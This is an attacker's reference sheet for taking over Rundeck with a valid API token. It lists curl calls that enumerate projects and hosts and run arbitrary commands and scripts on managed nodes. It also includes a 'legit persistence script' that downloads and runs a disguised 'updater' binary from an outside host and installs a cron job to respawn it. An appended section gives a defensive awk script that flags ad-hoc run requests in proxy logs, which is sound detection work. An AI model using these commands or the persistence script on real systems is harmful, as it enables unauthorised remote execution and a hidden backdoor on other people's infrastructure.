Rundeck Takeover Reference

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.

RUNDECK="https://host"
TOKEN="x-rundeck-auth-token:<secret>"

# Identify projects
curl -H $TOKEN $RUNDECK/api/16/projects/ -H accept:application/json | jq  .

# Identify resources/hosts in project
PROJECTNAME="<update>"
curl -H $TOKEN $RUNDECK/api/17/project/$PROJECTNAME/resources -H accept:application/json | jq  . 

# Run a command on your target host
TARGET="targethost"
CMDS="id; pwd; ls /var/lib; ps aux; w; curl -s ifconfig.co"
curl -H $TOKEN --data-urlencode "filter=name: $TARGET" --data-urlencode "exec=$CMDS"  -H "Accept: application/json" $RUNDECK/api/17/project/$PROJECTNAME/run/command

# Run a script on your target host
SCRIPT="script.sh"
curl -H $TOKEN --data-urlencode "filter=name: $TARGET" -F "scriptFile=@./$SCRIPT"   -H "Content-Type: multipart/form-data"  -H "Accept: application/json" $RUNDECK/api/17/project/$PROJECTNAME/run/script 

# Get output from commands run
ID="<Update with the ID output from the previous command or script execution>"
curl -H $TOKEN -H "Accept: application/json" $RUNDECK/api/5/execution/$ID/output

# Abort execution
curl -H $TOKEN -H "Accept: application/json" $RUNDECK/api/11/execution/$ID/abort

# legit persistence script
#!/bin/bash
p="/home/rundeck/updater"
curl http://host/en/us/updater -o "$p" 
chmod +x "$p"
$p &

runsvc="/home/rundeck/updatesvc"
(crontab -l ; echo "* * * * * /bin/bash $runsvc")|crontab 2> /dev/null

cat > "$runsvc" << EOF
#!/bin/bash
if ! ps aux | grep '[u]pdater' | grep -v 'def' > /dev/null; then
    $p &
fi
EOF

chmod +x $runsvc

References

https://docs.rundeck.com/docs/api/rundeck-api.html#running-adhoc-commands
https://docs.rundeck.com/docs/api/rundeck-api.html#running-adhoc-scripts
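
For defenders: the ad-hoc command and script calls above hit two recognisable paths, `/api/<version>/project/<name>/run/command` and `/run/script`. The following is an added example, not part of the original notes, that counts such requests per client and project in an access log; it assumes Rundeck sits behind a reverse proxy writing combined log format, and the function names and sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag Rundeck ad-hoc execution API calls in an access log.
# Assumption: a reverse proxy in front of Rundeck logs in combined log format.

# Reads log lines from the given files (or stdin) and prints
# "client_ip project kind count" for every ad-hoc run request.
rundeck_adhoc_hits() {
    awk '
    {
        # The request line is the first double-quoted field: METHOD PATH PROTO
        n = split($0, q, "\"")
        if (n < 3) next
        split(q[2], req, " ")
        path = req[2]
        sub(/[?].*/, "", path)            # ignore any query string
        if (path !~ "^/api/[0-9]+/project/[^/]+/run/(command|script)/?$") next
        split(path, seg, "/")             # "", api, version, project, name, run, kind
        hits[$1 " " seg[5] " " seg[7]]++
    }
    END { for (k in hits) print k, hits[k] }
    ' "$@" | LC_ALL=C sort
}

# Constructed sample lines (documentation IP ranges, not from a real system).
sample_log() {
cat <<'EOF'
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /api/16/projects/ HTTP/1.1" 200 512 "-" "curl/8.4.0"
203.0.113.7 - - [12/Mar/2024:10:01:20 +0000] "GET /api/17/project/ops/resources HTTP/1.1" 200 2048 "-" "curl/8.4.0"
203.0.113.7 - - [12/Mar/2024:10:01:40 +0000] "POST /api/17/project/ops/run/command HTTP/1.1" 200 98 "-" "curl/8.4.0"
203.0.113.7 - - [12/Mar/2024:10:02:05 +0000] "POST /api/17/project/ops/run/command HTTP/1.1" 200 98 "-" "curl/8.4.0"
203.0.113.7 - - [12/Mar/2024:10:02:30 +0000] "POST /api/17/project/ops/run/script HTTP/1.1" 200 98 "-" "curl/8.4.0"
203.0.113.7 - - [12/Mar/2024:10:02:45 +0000] "GET /api/5/execution/41/output HTTP/1.1" 200 900 "-" "curl/8.4.0"
198.51.100.20 - - [12/Mar/2024:11:15:00 +0000] "GET /api/17/project/ops/run/command?exec=uptime HTTP/1.1" 200 98 "-" "python-requests/2.31"
EOF
}

# Stand-alone run over the constructed sample.
sample_log | rundeck_adhoc_hits
```

When the parameters are sent as form data, as in the curl calls above, `filter` and `exec` travel in the request body, so the access log only shows that an ad-hoc run took place; the command text has to be recovered from Rundeck's own execution records.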
